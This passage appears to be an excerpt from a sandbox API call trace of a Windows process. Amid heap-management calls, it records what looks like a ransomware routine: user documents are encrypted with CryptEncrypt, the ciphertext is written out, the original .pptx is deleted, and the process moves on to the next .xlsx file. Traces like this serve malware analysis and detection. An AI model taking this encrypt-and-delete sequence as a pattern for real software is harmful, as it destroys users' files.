lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0075.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0075.660] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0075.661] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.661] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0075.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0075.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0075.662] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.662] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.662] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.662] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.664] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca910, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0075.665] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x11972, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x11980) returned 1 [0075.665] CharLowerBuffW (in: lpsz="byte[72065]", cchLength=0xb | out: lpsz="byte[72065]") returned 0xb [0075.668] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.668] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cad18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0075.668] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4440038*, pdwDataLen=0x144e790*=0x11972, dwBufLen=0x11980 | out: pbData=0x4440038*, pdwDataLen=0x144e790*=0x11980) returned 1 [0075.669] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.669] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.669] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.670] WriteFile (in: hFile=0x298, lpBuffer=0x441cd40*, nNumberOfBytesToWrite=0x11980, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x441cd40*, lpNumberOfBytesWritten=0x144f194*=0x11980, lpOverlapped=0x0) returned 1 [0075.673] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0075.673] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.673] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0075.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca658, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0075.674] CryptDestroyKey (hKey=0x41ac780) returned 1 [0075.674] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.674] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.674] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.674] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.674] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.674] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.674] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.674] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.674] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0075.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0075.674] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0075.674] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.675] FreeLibrary (hLibModule=0x756e0000) returned 1 [0075.675] CloseHandle (hObject=0x258) returned 1 [0075.675] CloseHandle (hObject=0x298) returned 1 [0075.746] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\AGO5jVFwME.pptx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\AGO5jVFwME.pptx", lpFilePart=0x0) returned 0x29 [0075.747] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\AGO5jVFwME.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ago5jvfwme.pptx")) returned 0x20 [0075.747] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\AGO5jVFwME.pptx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17e287a0, ftCreationTime.dwHighDateTime=0x1d5b731, ftLastAccessTime.dwLowDateTime=0x1212f6b0, ftLastAccessTime.dwHighDateTime=0x1d572fe, ftLastWriteTime.dwLowDateTime=0x1212f6b0, ftLastWriteTime.dwHighDateTime=0x1d572fe, nFileSizeHigh=0x0, nFileSizeLow=0x11972, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="AGO5jVFwME.pptx", cAlternateFileName="AGO5JV~1.PPT")) returned 0x41ac440 [0075.747] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\AGO5jVFwME.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ago5jvfwme.pptx")) returned 1 [0075.751] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17e287a0, ftCreationTime.dwHighDateTime=0x1d5b731, ftLastAccessTime.dwLowDateTime=0x1212f6b0, ftLastAccessTime.dwHighDateTime=0x1d572fe, ftLastWriteTime.dwLowDateTime=0x1212f6b0, ftLastWriteTime.dwHighDateTime=0x1d572fe, nFileSizeHigh=0x0, nFileSizeLow=0x11972, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="AGO5jVFwME.pptx", cAlternateFileName="AGO5JV~1.PPT")) returned 0 [0075.751] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0075.752] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0075.752] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9438 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0075.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0075.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0075.753] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0075.753] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0075.753] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0075.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0075.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21a0 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0075.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0075.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0075.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0075.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0075.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0075.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0075.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0075.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0075.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0075.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0075.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0075.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0075.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0075.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0075.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0075.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0075.754] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0075.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0075.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0075.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0075.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0075.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0075.754] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0075.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0075.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0075.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0075.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0075.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0075.766] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\aOtbGAAYxtk159gxW.xlsx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfde3f130, ftCreationTime.dwHighDateTime=0x1d5bec0, ftLastAccessTime.dwLowDateTime=0xe3ed4f80, ftLastAccessTime.dwHighDateTime=0x1d5ee5c, ftLastWriteTime.dwLowDateTime=0xe3ed4f80, ftLastWriteTime.dwHighDateTime=0x1d5ee5c, nFileSizeHigh=0x0, nFileSizeLow=0x12292, 